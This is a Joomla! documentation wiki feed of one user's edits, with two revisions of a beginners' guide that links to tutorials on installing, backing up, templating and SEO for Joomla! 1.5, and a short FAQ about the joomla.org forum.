Joomla! Documentation - User contributions [en]

User:Igeoffi

2009-01-08T06:07:00Z

Igeoffi: Removing all content from page

Portal:Beginners

2008-08-06T04:38:04Z

Igeoffi: /* SEO Questions */ fixed inconsistency

{{RightTOC}}
<noinclude>{{redirectstohere|Absolute Beginners Guide to Joomla!|Novices|What is Joomla}}</noinclude>

If you do nothing else, take time to complete the [http://help.joomla.org/ghop/feb2008/task048/joomla_15_quickstart.pdf Joomla! v 1.5 Quick Start Guide] [http://www.scribd.com/doc/2299418/Joomla-15-Quickstart Scribd], written by [[GHOP students/Kevin_Hayne|Kevin Hayne]]. As you read the guide, walk through the [http://help.joomla.org/ghop/feb2008/task167/index.html video accompaniment] created by [[GHOP students/Michael Casha|Michael Casha]]. This is a well developed and efficient training guide and video set.

=Absolute Beginners Guide to Joomla!=

Welcome to Joomla!, a leading open source Content Management System (CMS) platform. You have made a great choice to use Joomla! for your website. Joomla! is a well-tested, extensible and effective tool supported by a very active and friendly community of developers and users.

Do you want to get started with Joomla!, but you have no idea where to begin? Are you concerned that maybe you don't have the ''technical skills'' needed to be successful? Does it all seem ''a bit'' overwhelming? If so, you have come to the right place. The '''Absolute Beginner's Guide to Joomla!''' is just for you. This guide is intended for those who have ''no clue'' where to begin but really want to learn how to use Joomla!. Helping you become successful installing, configuring, backing up and restoring, upgrading, and extending Joomla! is exactly the point of this guide.

== Test Drive Joomla! ==
At this point, you might be aware that there are thousands and thousands of Joomla! websites in the world, each specifically crafted to meet the needs of the Web site owner. You might even have a neighbor or a friend who has a Joomla! Web site and now you want one of your very own, but you are uncertain if you have ''what it takes''. Maybe you have been lurking around the [http://forums.joomla.org Joomla! Forums] for awhile, observing others as they build Joomla! websites. Maybe you even have a case of '''Joomla! Web site Envy'''.

'''Take action, now!''' Begin by test driving Joomla! using a [http://demo.joomla.org/ Joomla! Demo site]. Log in to the backend Administrator and change a few things. Don't worry! You can't hurt anything! The demo sites are refreshed frequently. As you click around, consider the functionality you see. What would be great to have? What do you ''not'' want in your Web site?

Take a look at the [http://help.joomla.org/ghop/feb2008/task020/Joomla!%20Core%20Features%20V1.2.pdf Joomla! Core Features Guide] [http://www.scribd.com/doc/2299291/Joomla-Core-Features-V1-2 scribd], written by [[GHOP students/James William Ramsay|James Ramsay]]. See what features are available in each download of Joomla!. Yes, even in ''your'' copy!

If it doesn't all make sense, don't worry! You are just ''getting familiar''. For now, cruise around and enjoy the scenery. You should not be breaking a sweat at this point. Take it easy! Have fun! Don't worry about a thing. :)

== Conquer the Basics ==
It is time to learn the basics. In this section, all instructions are clearly provided. You are not expected to know anything about building a Web site before you begin. In only a short time, however, you will have learned a great deal. :-)

The most important step to building your Web site begins before you start. There are a number of considerations to [http://docs.joomla.org/Planning_Your_Web_site planning your Web site]. Take time to consider those ideas before getting started. It will save you much frustration and rework!

=== Complete the Joomla! v 1.5 Quick Start Guide ===

If you do nothing else, take time to complete the [http://help.joomla.org/ghop/feb2008/task048/joomla_15_quickstart.pdf Joomla! v 1.5 Quick Start Guide] [http://www.scribd.com/doc/2299418/Joomla-15-Quickstart Scribd], written by [[GHOP students/Kevin Hayne|Kevin Hayne]]. As you read the guide, walk through the [http://help.joomla.org/ghop/feb2008/task167/index.html video accompaniment] created by [[GHOP students/Michael Casha|Michael Casha]]. This is a well developed and efficient training guide and video set.

There are no prerequisites to this step-by-step course for building a Web site for a fictitious landscaping company. In the first few pages, you will have configured a localhost environment on your computer and installed Joomla!. Following the installation, you ''quickly'' learn how to configure all kinds of extensions, including components, modules and plugins. You will even make changes to the default template. The '''Joomla! v 1.5 Quick Start Guide''' is '''strongly recommended''' for all new Joomla! v 1.5 users. In a very short period of time, you will have learned enough that you can build a simple Joomla! Web site.

=== Learn the language ===

Familiarize yourself with the [[Joomla%21_Extensions_Defined|Joomla! lingo]]. [http://www.scribd.com/doc/2299530/Joomla-v-15-Extension-Types Scribd] The better you learn the language, the easier it will be to talk to the natives. Practice speaking these words in the car ride on the way to work, “Let’s see. A category belongs to a section.” Consider asking a friend to make you word games and crossword puzzles using Joomla! terms to drive home key concepts. :P

=== Guides for Joomla! Editors and Publishers ===
Those who edit and publish articles on your new Joomla! site will also need help to understand what they must do. The [http://help.joomla.org/ghop/feb2008/task056/createarticletres.odt Author tutorial] by brianfast [http://www.scribd.com/doc/2299545/Joomla-v-15-How-to-create-an-Article Scribd] and an excellent guide for the [http://help.joomla.org/ghop/feb2008/task063/joomlawebmaster.odt Joomla! Publisher] [http://www.scribd.com/doc/2300190/Joomla-v-1-5-Webmaster-and-Publisher-Tutorial Scribd] by [[GHOP students/Max Shinn|Max Shinn (trombonechamp)]] could be very helpful.

=== General Joomla! v 1.5 Questions? ===

Ask questions in the [http://forum.joomla.org/viewforum.php?f=428 General Joomla! v 1.5 forum board].

= Master System Administration =

System Administration is a very important part to running a successful Web site. It is a good idea to practice installing Joomla! on a localhost environment. Then, learn to move your Joomla! website to a Web host and how to backup and restore your Joomla! database. Knowing how to do these things before you even begin creating your Web site ensures you will be ready if something unfortunate happens. With that knowledge in place, you can move forward with confidence.

== Installation ==

Installing Joomla! can be easy to do -- especially on a localhost environment. Sometimes, though, issues at your Web host can make installation very challenging. Make certain you take advantage of the support your host provides. In the end, they are best able to help.

=== Install Joomla! on a localhost ===

The easiest way to get started with Joomla! is to install it on your desktop computer. Watch this video entitled [http://www.veoh.com/videos/v1802750A7Mnpe7z How to Install XAMPP and Joomla! v 1.5], by Andrew Altamirano (slogen123), where he shows you how to download and install XAMPP as a local server and then install Joomla!. A localhost is a great way to learn how to use Joomla!, to try extensions out in a test environment before updating your live site, and for first testing out upgrades. Learn to use a localhost right away. It will be well worth your time.

=== Use the Joomla! v 1.5 Installation Guide ===

All Web host environments are different. Check out the [http://downloads.joomlacode.org/docmanfileversion/1/7/4/17471/1.5_Installation_Manual_version_0.5.pdf Joomla! v 1.5 Installation Manual] for a detailed set of installation instructions.

== Learn to Backup and Restore ==

Learn to backup your Joomla! database. Learn to restore your Joomla! database. Practice. A lot! Frequent backups are the best way to sleep at night. Check out this video entitled [http://video.google.com/videoplay?docid=2742157386318372444 How to backup and restore a Joomla! database using phpMyAdmin] by kristofdb. It's not hard - learn to do it after you install Joomla! but before you configure the environment.

== How to Recover Your System Administration Password ==

We have all done it, some of us dozens of times! Watch this video by [[GHOP students/James William Ramsay|James Ramsey]] entitled [http://www.veoh.com/videos/v1818492yRNhWTdg How to Recover your Administrator Password using phpMyAdmin].

=== Installation Questions? ===

Ask questions in the [http://forum.joomla.org/viewforum.php?f=429 Installing Joomla! v 1.5 forum board].

= Maximize Use of the Core, ''Then'' Install Extensions =

Many times, new Joomla! users find the Joomla! Extension Directory and install everything that looks cool! That's not always a good idea. It's best to maximize the use of the core code before you add extensions to your site. With each extension that you install, you complicate your site administration requirements and slow your site down. Upgrades are also more complicated. Extensions are great but make certain you really need them, first.

== Exploring the possibilities with Joomla! v 1.5 Core ==

* Learn what is possible given the core [http://help.joomla.org/ghop/feb2008/task028/Joomla%20Menu%20Types.zip Joomla! Menu Types] [http://www.scribd.com/doc/2299861/Joomla-v-15-Menu-Types Scribd] by xalnx;
* Understand all the options available when you create a [http://help.joomla.org/ghop/feb2008/task029/Issue_29_Joomla_Category_Blog_Layout_document_v2.zip Joomla! Category Blog Layout] [http://www.scribd.com/doc/2299872/Joomla-v-15-Category-Blog-Layout Scribd] by hashani;
* Watch this video on [http://help.joomla.org/ghop/feb2008/task055/Joomla!_GHOP_Issue_055.mov How to embed media within a Joomla! article] by mdranta;
* Explore the possibilities with [http://help.joomla.org/ghop/feb2008/task066/MediaManager.odt Using the media manager] [http://www.scribd.com/doc/2299878/Joomla-v-15-Using-the-Media-Manager Scribd] by SharifOerton;
* Learn [http://help.joomla.org/ghop/feb2008/task026/Rev10-Final.zip How to Use Joomla!'s Register to Read More] [http://www.scribd.com/doc/2299883/Joomla-v-15-Register-to-Read-More Scribd] by drmmr763;
* Make certain to learn how to [http://help.joomla.org/ghop/feb2008/task104/How_to_create_a_custom_HTML_module.zip Create a custom HTML module] [http://www.scribd.com/doc/2299886/Joomla-v-15-How-to-create-a-custom-HTML-module- Scribd] by blitzprog;
* Learn how to [http://help.joomla.org/ghop/feb2008/task105/using_media_manager.zip Use the Media Manager to Offer File Downloads] [http://www.scribd.com/doc/2299888/Joomla-v-15-Using-Media-Manager-for-File-Downloads Scribd] by fervidfrogger;
* Learn how to create a simple [http://help.joomla.org/ghop/feb2008/task106/Joomla%20Image%20Gallery.odt Image Gallery using the Media Manager] [http://www.scribd.com/doc/2299943/Joomla-v-15-Image-Gallery-using-the-Media-Manager Scribd] by SharifOerton;
* Learn how to use core [http://help.joomla.org/ghop/feb2008/task107/BDRev5.zip Contact functions to create a services or resources directory] [http://www.scribd.com/doc/2299950/Joomla-v-15-Contact-functions-to-create-a-services-or-resources-directory Scribd] by [[GHOP students/Chad Windnagle|Chad Windnagle (drmmr763)]];
* Take time to explore how to use the [http://help.joomla.org/ghop/feb2008/task108/Newsflashtutorialfinal.odt News flash module to display random or rotating selection of texts] [http://www.scribd.com/doc/2299953/Joomla-v-15-News-flash-module-to-display-random-or-rotating-selection-of-texts Scribd] by tj.ferrell;
* Take advantage of the [http://help.joomla.org/ghop/feb2008/task109/task%20109.pdf Banners component and module to feature different parts of a website] [http://www.scribd.com/doc/2299956/Joomla-v-15-Banners-component-and-module-to-feature-different-parts-of-a-website Scribd] by [[GHOP students/Branko Pajic|Branko Pajic (balvanboy)]];
* Read through the [[Help screens]] to find out about all options available at the Back-end

== Using Mootools ==

There are many great things you can do with Mootools, included in Joomla! v 1.5. Check out these resources to learn how:

* [http://help.joomla.org/ghop/feb2008/task083/Mootools%20Tips%20and%20Tricks.odt Mootools Tips and Tricks] [http://www.scribd.com/doc/2299965/Joomla-v-15-Mootools-Tips-and-Tricks Scribd] by [[GHOP students/Zach Kanzler|Zach Kanzler (theY4Kman)]];
* How to include [http://help.joomla.org/ghop/feb2008/task084/joomla.odt Squeezebox in your Joomla! Website] [http://www.scribd.com/doc/2299973/Joomla-v-15-Squeezebox-in-your-Joomla-Website Scribd] by ddcc;
* How to include [http://help.joomla.org/ghop/feb2008/task085/draft3HowtoincludeSlimboxinJoomla.odt Slimbox in your Joomla! Website] [http://www.scribd.com/doc/2299983/Joomla-v-15-Slimbox-in-your-Joomla-Website Scribd] by dsadik.

== Venture into Joomla! v 1.5 Extensions ==

Third party developers are solely responsible for their extensions and the quality of their code and timeliness at upgrades is not guaranteed by anyone other than that developer. There are many developers who produce very high quality code. It is best to stick with GPL or GPL-compatiable extensions although you might also find proprietary extensions on the Joomla! Extension Directory. If you purchase an extension and are unsatisfied with the result, Joomla! org cannot help you with those issues.

Take time to review the wealth of extensions available on the [http://extensions.joomla.org Joomla! Extensions Directory].

=== Questions? ===

* [[jforum:428 General Joomla! v 1.5 Questions]]
* [[jforum:466 Joomla! v 1.5 Template Questions]]
* [[jforum:470 Joomla! v 1.5 Extension Questions]]
* [[jforum:262 Joomla! Extension Directory Questions]]

= Learn the Basics for Joomla! Templating =

For many, there are only a few changes desired with the default Joomla! v 1.5 Template to make it work for their needs. These resources will help you learn how to make minor changes.

== Minor Default Template Changes ==
* How to [http://help.joomla.org/ghop/feb2008/task093/replace%20the%20logo%20image.odt replace the logo image in the Milkyway template] [http://www.scribd.com/doc/2299991/Joomla-v-1-5-How-to-replace-the-logo-image-in-the-Milkyway-template Scribd] by deckers.olivier
* [http://help.joomla.org/ghop/feb2008/task033/033%20-%20Create%20a%20document%20explaining%20how%20to%20modify%20the%20default%20Template.zip How to modify the default Template] [http://www.scribd.com/doc/2300042/Joomla-v-15-How-to-modify-the-default-Template Scribd] by [[GHOP students/Chad Windnagle|Chad Windnagle (drmmr763)]].

== Using CSS Class Suffixes ==
There are other simple things you can do with templates to achieve the look you need. These simple tutorials could be very helpful.

* [http://help.joomla.org/ghop/feb2008/task057/Joomla%20Class%20Suffix%20Guides.pdf How to use CSS class suffixes in Joomla! 1.5] [http://www.scribd.com/doc/2300098/Joomla-v-15-How-to-use-CSS-class-suffixes Scribd] by takercena.

== Getting Rid of Tables ==
* If you do not like tables in your Joomla! output, please see [http://help.joomla.org/ghop/feb2008/task059/Getting_Started_with_Template_Overrides_v2.tar.gz Getting Started with Template Overrides] [http://www.scribd.com/doc/2300107/Joomla-v-1-5-Getting-Started-with-Template-Overrides Scribd] by [[GHOP students/Wickrama Arachchi Vithanage Hashani Maduwanthi Weerarathna|Wickrama Arachchi Vithanage Hashani Maduwanthi Weerarathna (Hashani)]]

== Adding Javascript to your Template ==
* You might be interested in [http://help.joomla.org/ghop/feb2008/task060/task60.odt How to add JavaScript to a Joomla template] [http://www.scribd.com/doc/2300110/Joomla-v-15-Adding-Javascript-to-your-Template Scribd] by [[GHOP students/Anner J. Bonilla|Anner J. Bonilla (annerajb)]].

== Troubleshooting a Template Installation ==
If you are having trouble installing a template, see [http://help.joomla.org/ghop/feb2008/task061/Rev9.zip How to resolve problems with a template installation] [http://www.scribd.com/doc/2300161/Joomla-v-1-5-Template-Installation-Troubleshooting-Manual Scribd] by [[GHOP students/Chad Windnagle|Chad Windnagle (drmmr763)]].

=== Questions? ===

* [http://forum.joomla.org/viewforum.php?f=466 Joomla! v 1.5 Template Questions]

= Address Search Engine Optimization =
Search Engine Optimization is the practice of doing whatever is needed to help make your Web site rank higher in return results for a search engine. For some, this is very important aspect of attracting visitors to their site. Most experts agree, however, that the single best way to improve your chance of getting attention on the Internet is to provide good content on a regular basis. There are several things that you can do using core functionality to make your Joomla! Web site more SEO friendly. Here are some important areas to focus.

== Configure and troubleshoot SEF URLs ==
* [http://help.joomla.org/ghop/feb2008/task110/GHOPC_J110_SEFrevised-1.odt Joomla! v 1.5 SEF URLs] [http://www.scribd.com/doc/2300167/Joomla-v-15-Configure-and-troubleshoot-SEF-URLs Scribd] by [[GHOP students/Benjamin Hättasch|Benjamin Hättasch]].
* If you want to use IIS and Joomla!'s SEF URLs, [http://docs.joomla.org/IIS6_and_SEF_URLs_using_Joomla_1.5x do this first], then use the previous document.

== Remove WWW from your domain name ==
* [http://help.joomla.org/ghop/feb2008/task111/remove_www_from_domain6.odt How to remove "WWW" from your Domain Name and Why it matters] [http://www.scribd.com/doc/2300173/Joomla-How-to-Remove-www-from-domain-and-why-it-matters Scribd] by theoclymenus

== Create a Custom 404 Page ==
* [http://docs.joomla.org/Custom_error_pages Custom Error Pages, including 404's]

== SEO Questions ==
Questions on these topics should be asked in the [http://forum.joomla.org/viewforum.php?f=431 Joomla! v 1.5 Administration Forum].

=== SEO and SEF URL Questions? ===

* [http://forum.joomla.org/viewforum.php?f=431 Joomla! v 1.5 Administration Forum]

= Converting an Existing Website to Joomla! =

Check out the [[How to Convert an existing Web site to a Joomla! Web site]] guide for great step by step instructions.

= Asking Questions in the Forums =

At some point in this journey, you started feeling confident enough to reach out to others and began using the Forums. There are a few "common courtesies" you should be aware of:

* First of all, did you actually read the assignments? If not, do! Only you can help yourself learn and reading this material will do the trick!

* Please make certain you search, first, before posting a question. Nine times out of ten someone else had the same issue that you had. As it turns out, we all travel a similar path.

* Also, check the [[FAQs]]. There is already a TON of stuff out there that you WILL find helpful. Being responsible to search and review existing material keeps the questions at a manageable level for the volunteers who help.

* Be clear and specific in your request for help. Entries like “Help! It doesn’t work!” tend to get ignored. Try to explain everything that led up to your problem. Try to explain what your problem is. Be clear about what you want to happen. And, thank those who bother to help!

* Use the [http://forum.joomla.org/viewtopic.php?f=428&t=272481 Forum Post Assistant] to help you provide more information and better explain your problem.

* If your question/problem was solved, mark your thread as solved by editing the first post you made in that thread and changing the topic icon to the green check mark with a circle. You can also add [Solved] to your topic title. By doing this you allow other members who are doing searches to easily differentiate between solved and unsolved issues. This also saves the volunteers' time of having to open up solved topics.

= Thanks to our GHOP Contestants! =

Most of this material was written by Joomla! Google Highly Open Participation Contestants. This work is of the highest quality and the students were inspiring to work with. Sincere thanks to all of our participants for sharing their gifts with the Joomla! community. You guys rock!


[[Category:Landing Pages]]

Joomla! Forum FAQs

2008-07-28T17:15:14Z

Igeoffi: +ranks/colored usernames

{{review}}
===What forum is used at joomla.org?===

We are currently using the forum software, phpBB3. phpBB is located here: http://www.phpbb.com/

===How is the forum at joomla.org integrated with Joomla!?===
The forum is not bridged with Joomla! in any way. The forum uses a customized theme that matches the rest of the joomla.org sites.

===What are the rules of the joomla.org forums?===
You can read the current forum rules here: http://forum.joomla.org/viewtopic.php?f=8&t=65

===How do you empty your PM-box on the forum?===

Problem
Your PM-box is full and nobody can send you anymore messages. How to solve this?

Solution
go to your messages and "check" the box and click delete for those you want to delete.

Note: READ them first before you delete them!

===How do I search the forum to find what I need?===

The forum search is somewhat tricky. Here are some tips for effective searching:

#Searches are case sensitive, so try upper and lower case. For example, xml and XML will give different results.
#Searches are for whole words, so for example error and errors will give different results.The forums are spidered by external search engines so you may be more successful using one of these.
#Advanced search will let you search with more parameters.

===What are the stars/ranks under the forum username represent?===
The stars and ranks are based upon the number of posts a user has. See this page for more details:[[Explain 5 Star Rating System For Forum Posters]].

===Why are there different colors of usernames?===
The different colors of the usernames are used to differentiate between the different working groups of Joomla!. See this page for more details:[[Explain 5 Star Rating System For Forum Posters]].

<noinclude>[[Category:FAQ]]</noinclude>

Portal:Beginners

2008-07-27T22:19:44Z

Igeoffi: /* Asking Questions in the Forums */ wikitag faqs, add forum post assistant, marked thread as solved

{{RightTOC}}
<noinclude>{{redirectstohere|Absolute Beginners Guide to Joomla!|Novices|What is Joomla}}</noinclude>

If you do nothing else, take time to complete the [http://help.joomla.org/ghop/feb2008/task048/joomla_15_quickstart.pdf Joomla! v 1.5 Quick Start Guide] [http://www.scribd.com/doc/2299418/Joomla-15-Quickstart Scribd], written by [[GHOP students/Kevin_Hayne|Kevin Hayne]]. As you read the guide, walk through the [http://help.joomla.org/ghop/feb2008/task167/index.html video accompaniment] created by [[GHOP students/Michael Casha|Michael Casha]]. This is a well developed and efficient training guide and video set.

=Absolute Beginners Guide to Joomla!=

Welcome to Joomla!, a leading open source Content Management System (CMS) platform. You have made a great choice to use Joomla! for your website. Joomla! is a well-tested, extensible and effective tool supported by a very active and friendly community of developers and users.

Do you want to get started with Joomla!, but you have no idea where to begin? Are you concerned that maybe you don't have the ''technical skills'' needed to be successful? Does it all seem ''a bit'' overwhelming? If so, you have come to the right place. The '''Absolute Beginner's Guide to Joomla!''' is just for you. This guide is intended for those who have ''no clue'' where to begin but really want to learn how to use Joomla!. Helping you become successful installing, configuring, backing up and restoring, upgrading, and extending Joomla! is exactly the point of this guide.

== Test Drive Joomla! ==
At this point, you might be aware that there are thousands and thousands of Joomla! websites in the world, each specifically crafted to meet the needs of the Web site owner. You might even have a neighbor or a friend who has a Joomla! Web site and now you want one of your very own, but you are uncertain if you have ''what it takes''. Maybe you have been lurking around the [http://forums.joomla.org Joomla! Forums] for awhile, observing others as they build Joomla! websites. Maybe you even have a case of '''Joomla! Web site Envy'''.

'''Take action, now!''' Begin by test driving Joomla! using a [http://demo.joomla.org/ Joomla! Demo site]. Log in to the backend Administrator and change a few things. Don't worry! You can't hurt anything! The demo sites are refreshed frequently. As you click around, consider the functionality you see. What would be great to have? What do you ''not'' want in your Web site?

Take a look at the [http://help.joomla.org/ghop/feb2008/task020/Joomla!%20Core%20Features%20V1.2.pdf Joomla! Core Features Guide] [http://www.scribd.com/doc/2299291/Joomla-Core-Features-V1-2 scribd], written by [[GHOP students/James William Ramsay|James Ramsay]]. See what features are available in each download of Joomla!. Yes, even in ''your'' copy!

If it doesn't all make sense, don't worry! You are just ''getting familiar''. For now, cruise around and enjoy the scenery. You should not be breaking a sweat at this point. Take it easy! Have fun! Don't worry about a thing. :)

== Conquer the Basics ==
It is time to learn the basics. In this section, all instructions are clearly provided. You are not expected to know anything about building a Web site before you begin. In only a short time, however, you will have learned a great deal. :-)

The most important step to building your Web site begins before you start. There are a number of considerations to [http://docs.joomla.org/Planning_Your_Web_site planning your Web site]. Take time to consider those ideas before getting started. It will save you much frustration and rework!

=== Complete the Joomla! v 1.5 Quick Start Guide ===

If you do nothing else, take time to complete the [http://help.joomla.org/ghop/feb2008/task048/joomla_15_quickstart.pdf Joomla! v 1.5 Quick Start Guide] [http://www.scribd.com/doc/2299418/Joomla-15-Quickstart Scribd], written by [[GHOP students/Kevin Hayne|Kevin Hayne]]. As you read the guide, walk through the [http://help.joomla.org/ghop/feb2008/task167/index.html video accompaniment] created by [[GHOP students/Michael Casha|Michael Casha]]. This is a well developed and efficient training guide and video set.

There are no prerequisites to this step-by-step course for building a Web site for a fictitious landscaping company. In the first few pages, you will have configured a localhost environment on your computer and installed Joomla!. Following the installation, you ''quickly'' learn how to configure all kinds of extensions, including components, modules and plugins. You will even make changes to the default template. The '''Joomla! v 1.5 Quick Start Guide''' is '''strongly recommended''' for all new Joomla! v 1.5 users. In a very short period of time, you will have learned enough that you can build a simple Joomla! Web site.

=== Learn the language ===

Familiarize yourself with the [[Joomla%21_Extensions_Defined|Joomla! lingo]]. [http://www.scribd.com/doc/2299530/Joomla-v-15-Extension-Types Scribd] The better you learn the language, the easier it will be to talk to the natives. Practice speaking these words in the car ride on the way to work, “Let’s see. A category belongs to a section.” Consider asking a friend to make you word games and crossword puzzles using Joomla! terms to drive home key concepts. :P

=== Guides for Joomla! Editors and Publishers ===
Those who edit and publish articles on your new Joomla! site will also need help to understand what they must do. The [http://help.joomla.org/ghop/feb2008/task056/createarticletres.odt Author tutorial] by brianfast [http://www.scribd.com/doc/2299545/Joomla-v-15-How-to-create-an-Article Scribd] and an excellent guide for the [http://help.joomla.org/ghop/feb2008/task063/joomlawebmaster.odt Joomla! Publisher] [http://www.scribd.com/doc/2300190/Joomla-v-1-5-Webmaster-and-Publisher-Tutorial Scribd] by [[GHOP students/Max Shinn|Max Shinn (trombonechamp)]] could be very helpful.

=== General Joomla! v 1.5 Questions? ===

Ask questions in the [http://forum.joomla.org/viewforum.php?f=428 General Joomla! v 1.5 forum board].

= Master System Administration =

System Administration is a very important part to running a successful Web site. It is a good idea to practice installing Joomla! on a localhost environment. Then, learn to move your Joomla! website to a Web host and how to backup and restore your Joomla! database. Knowing how to do these things before you even begin creating your Web site ensures you will be ready if something unfortunate happens. With that knowledge in place, you can move forward with confidence.

== Installation ==

Installing Joomla! can be easy to do -- especially on a localhost environment. Sometimes, though, issues at your Web host can make installation very challenging. Make certain you take advantage of the support your host provides. In the end, they are best able to help.

=== Install Joomla! on a localhost ===

The easiest way to get started with Joomla! is to install it on your desktop computer. Watch this video entitled [http://www.veoh.com/videos/v1802750A7Mnpe7z How to Install XAMPP and Joomla! v 1.5], by Andrew Altamirano (slogen123), where he shows you how to download and install XAMPP as a local server and then install Joomla!. A localhost is a great way to learn how to use Joomla!, to try extensions out in a test environment before updating your live site, and for first testing out upgrades. Learn to use a localhost right away. It will be well worth your time.

=== Use the Joomla! v 1.5 Installation Guide ===

All Web host environments are different. Check out the [http://downloads.joomlacode.org/docmanfileversion/1/7/4/17471/1.5_Installation_Manual_version_0.5.pdf Joomla! v 1.5 Installation Manual] for a detailed set of installation instructions.

== Learn to Backup and Restore ==

Learn to backup your Joomla! database. Learn to restore your Joomla! database. Practice. A lot! Frequent backups are the best way to sleep at night. Check out this video entitled [http://video.google.com/videoplay?docid=2742157386318372444 How to backup and restore a Joomla! database using phpMyAdmin] by kristofdb. It's not hard - learn to do it after you install Joomla! but before you configure the environment.

== How to Recover Your System Administration Password ==

We have all done it, some of us dozens of times! Watch this video by [[GHOP students/James William Ramsay|James Ramsey]] entitled [http://www.veoh.com/videos/v1818492yRNhWTdg How to Recover your Administrator Password using phpMyAdmin].

=== Installation Questions? ===

Ask questions in the [http://forum.joomla.org/viewforum.php?f=429 Installing Joomla! v 1.5 forum board].

= Maximize Use of the Core, ''Then'' Install Extensions =

Many times, new Joomla! users find the Joomla! Extension Directory and install everything that looks cool! That's not always a good idea. It's best to maximize the use of the core code before you add extensions to your site. With each extension that you install, you complicate your site administration requirements and slow your site down. Upgrades are also more complicated. Extensions are great but make certain you really need them, first.

== Exploring the possibilities with Joomla! v 1.5 Core ==

* Learn what is possible given the core [http://help.joomla.org/ghop/feb2008/task028/Joomla%20Menu%20Types.zip Joomla! Menu Types] [http://www.scribd.com/doc/2299861/Joomla-v-15-Menu-Types Scribd] by xalnx;
* Understand all the options available when you create a [http://help.joomla.org/ghop/feb2008/task029/Issue_29_Joomla_Category_Blog_Layout_document_v2.zip Joomla! Category Blog Layout] [http://www.scribd.com/doc/2299872/Joomla-v-15-Category-Blog-Layout Scribd] by hashani;
* Watch this video on [http://help.joomla.org/ghop/feb2008/task055/Joomla!_GHOP_Issue_055.mov How to embed media within a Joomla! article] by mdranta;
* Explore the possibilities with [http://help.joomla.org/ghop/feb2008/task066/MediaManager.odt Using the media manager] [http://www.scribd.com/doc/2299878/Joomla-v-15-Using-the-Media-Manager Scribd] by SharifOerton;
* Learn [http://help.joomla.org/ghop/feb2008/task026/Rev10-Final.zip How to Use Joomla!'s Register to Read More] [http://www.scribd.com/doc/2299883/Joomla-v-15-Register-to-Read-More Scribd] by drmmr763;
* Make certain to learn how to [http://help.joomla.org/ghop/feb2008/task104/How_to_create_a_custom_HTML_module.zip Create a custom HTML module] [http://www.scribd.com/doc/2299886/Joomla-v-15-How-to-create-a-custom-HTML-module- Scribd] by blitzprog;
* Learn how to [http://help.joomla.org/ghop/feb2008/task105/using_media_manager.zip Use the Media Manager to Offer File Downloads] [http://www.scribd.com/doc/2299888/Joomla-v-15-Using-Media-Manager-for-File-Downloads Scribd] by fervidfrogger;
* Learn how to create a simple [http://help.joomla.org/ghop/feb2008/task106/Joomla%20Image%20Gallery.odt Image Gallery using the Media Manager] [http://www.scribd.com/doc/2299943/Joomla-v-15-Image-Gallery-using-the-Media-Manager Scribd] by SharifOerton;
* Learn how to use core [http://help.joomla.org/ghop/feb2008/task107/BDRev5.zip Contact functions to create a services or resources directory] [http://www.scribd.com/doc/2299950/Joomla-v-15-Contact-functions-to-create-a-services-or-resources-directory Scribd] by [[GHOP students/Chad Windnagle|Chad Windnagle (drmmr763)]];
* Take time to explore how to use the [http://help.joomla.org/ghop/feb2008/task108/Newsflashtutorialfinal.odt News flash module to display random or rotating selection of texts] [http://www.scribd.com/doc/2299953/Joomla-v-15-News-flash-module-to-display-random-or-rotating-selection-of-texts Scribd] by tj.ferrell;
* Take advantage of the [http://help.joomla.org/ghop/feb2008/task109/task%20109.pdf Banners component and module to feature different parts of a website] [http://www.scribd.com/doc/2299956/Joomla-v-15-Banners-component-and-module-to-feature-different-parts-of-a-website Scribd] by [[GHOP students/Branko Pajic|Branko Pajic (balvanboy)]];
* Read through the [[Help screens]] to find out about all options available at the Back-end

== Using Mootools ==

There are many great things you can do with Mootools, included in Joomla! v 1.5. Check out these resources to learn how:

* [http://help.joomla.org/ghop/feb2008/task083/Mootools%20Tips%20and%20Tricks.odt Mootools Tips and Tricks] [http://www.scribd.com/doc/2299965/Joomla-v-15-Mootools-Tips-and-Tricks Scribd] by [[GHOP students/Zach Kanzler|Zach Kanzler (theY4Kman)]];
* How to include [http://help.joomla.org/ghop/feb2008/task084/joomla.odt Squeezebox in your Joomla! Website] [http://www.scribd.com/doc/2299973/Joomla-v-15-Squeezebox-in-your-Joomla-Website Scribd] by ddcc;
* How to include [http://help.joomla.org/ghop/feb2008/task085/draft3HowtoincludeSlimboxinJoomla.odt Slimbox in your Joomla! Website] [http://www.scribd.com/doc/2299983/Joomla-v-15-Slimbox-in-your-Joomla-Website Scribd] by dsadik.

== Venture into Joomla! v 1.5 Extensions ==

Third party developers are solely responsible for their extensions and the quality of their code and timeliness at upgrades is not guaranteed by anyone other than that developer. There are many developers who produce very high quality code. It is best to stick with GPL or GPL-compatiable extensions although you might also find proprietary extensions on the Joomla! Extension Directory. If you purchase an extension and are unsatisfied with the result, Joomla! org cannot help you with those issues.

Take time to review the wealth of extensions available on the [http://extensions.joomla.org Joomla! Extensions Directory].

=== Questions? ===

* [[jforum:428 General Joomla! v 1.5 Questions]]
* [[jforum:466 Joomla! v 1.5 Template Questions]]
* [[jforum:470 Joomla! v 1.5 Extension Questions]]
* [[jforum:262 Joomla! Extension Directory Questions]]

= Learn the Basics for Joomla! Templating =

For many, there are only a few changes desired with the default Joomla! v 1.5 Template to make it work for their needs. These resources will help you learn how to make minor changes.

== Minor Default Template Changes ==
* How to [http://help.joomla.org/ghop/feb2008/task093/replace%20the%20logo%20image.odt replace the logo image in the Milkyway template] [http://www.scribd.com/doc/2299991/Joomla-v-1-5-How-to-replace-the-logo-image-in-the-Milkyway-template Scribd] by deckers.olivier
* [http://help.joomla.org/ghop/feb2008/task033/033%20-%20Create%20a%20document%20explaining%20how%20to%20modify%20the%20default%20Template.zip How to modify the default Template] [http://www.scribd.com/doc/2300042/Joomla-v-15-How-to-modify-the-default-Template Scribd] by [[GHOP students/Chad Windnagle|Chad Windnagle (drmmr763)]].

== Using CSS Class Suffixes ==
There are other simple things you can do with templates to achieve the look you need. These simple tutorials could be very helpful.

* [http://help.joomla.org/ghop/feb2008/task057/Joomla%20Class%20Suffix%20Guides.pdf How to use CSS class suffixes in Joomla! 1.5] [http://www.scribd.com/doc/2300098/Joomla-v-15-How-to-use-CSS-class-suffixes Scribd] by takercena.

== Getting Rid of Tables ==
